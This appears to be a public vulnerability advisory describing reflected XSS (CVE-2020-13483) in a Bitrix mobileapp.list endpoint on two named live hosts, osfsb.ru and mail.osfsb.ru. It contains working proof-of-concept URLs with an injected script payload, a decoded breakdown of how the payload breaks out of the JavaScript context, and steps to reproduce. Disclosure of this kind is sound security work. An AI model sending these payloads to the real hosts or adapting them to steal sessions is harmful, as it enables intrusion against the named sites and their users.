FSB: FOR and AGAINST XSS Vulnerability
2025-01-14 21:18:18 Author: cxsecurity.com


CVSS Base Score: 4.3/10

Impact Subscore: 2.9/10

Exploitability Subscore: 8.6/10

Exploit range: Remote

Attack complexity: Medium

Authentication: Not required

Confidentiality impact: None

Integrity impact: Partial

Availability impact: None

# Exploit Title: FSB: FOR and AGAINST XSS Vulnerability
# Author: Чингис хаан
# Product: FSB: FOR and AGAINST
# Tested On: Kali Linux
# CVE: CVE-2020-13483
# Vulnerability Type: Cross-Site Scripting (XSS)
# Severity: Medium
# Disclosure Status: Public

# Vulnerability Description
# Affected endpoint: https://www.osfsb.ru/bitrix/components/bitrix/mobileapp.list/ajax.php/

---------------------------------------------------------------------------------------------------
FSB: FOR and AGAINST XSS

[CVE-2020-13483] [http] [medium] https://mail.osfsb.ru/bitrix/components/bitrix/mobileapp.list/ajax.php/?AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&items%5BITEMS%5D%5BID%5D=<a+href="/*">*/%29%7D%29;function+__MobileAppList()%7Balert(1)%7D//>
[CVE-2020-13483] [http] [medium] https://www.osfsb.ru/bitrix/components/bitrix/mobileapp.list/ajax.php/?AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&items%5BITEMS%5D%5BID%5D=<a+href="/*">*/%29%7D%29;function+__MobileAppList()%7Balert(1)%7D//>

The FSB: FOR and AGAINST application is vulnerable to reflected Cross-Site Scripting (XSS) via the Bitrix mobileapp.list component (the /bitrix/components/bitrix/ path shows the affected code is the Bitrix component, deployed on the osfsb.ru hosts). The vulnerability arises from insufficient input validation and output encoding in the ajax.php endpoint: the value of the items[ITEMS][ID] parameter is written into the response without encoding for the context it lands in. The payload is carried in the request URL and executes when that URL is loaded, so nothing is persisted on the server and the attacker must get a victim to open the crafted link.

As the payload shows, the parameter is reflected into a JavaScript context: `*/});` closes the surrounding expression, `function __MobileAppList(){alert(1)}` redefines the component's callback so that it runs attacker-controlled code, and `//` comments out the remainder of the original statement. Arbitrary JavaScript therefore runs in the victim's browser in the origin of the affected site, potentially leading to session hijacking, defacement, or unauthorized actions on behalf of the victim.

Affected Component

The vulnerability exists in the following endpoint:

https://www.osfsb.ru/bitrix/components/bitrix/mobileapp.list/ajax.php/

Proof of Concept (PoC)

The two URLs listed above demonstrate the vulnerability by injecting the same payload into the items[ITEMS][ID] parameter, once against mail.osfsb.ru (Payload 1) and once against www.osfsb.ru (Payload 2). URL-decoded, the injected value is:

<a href="/*">*/});function __MobileAppList(){alert(1)}//>

When either URL is accessed, the injected JavaScript (alert(1)) is executed in the victim's browser.

Steps to Reproduce

1. Open a web browser and navigate to one of the PoC URLs provided above.
2. Observe that the JavaScript alert(1) is executed, confirming the presence of the XSS vulnerability.

Impact

Session Hijacking: An attacker can steal session cookies (unless they are marked HttpOnly) and impersonate the victim.
Defacement: An attacker can modify the content of the affected page.
Unauthorized Actions: An attacker can perform actions on behalf of the victim, such as changing account settings or making transactions.





Source: https://cxsecurity.com/issue/WLB-2025010014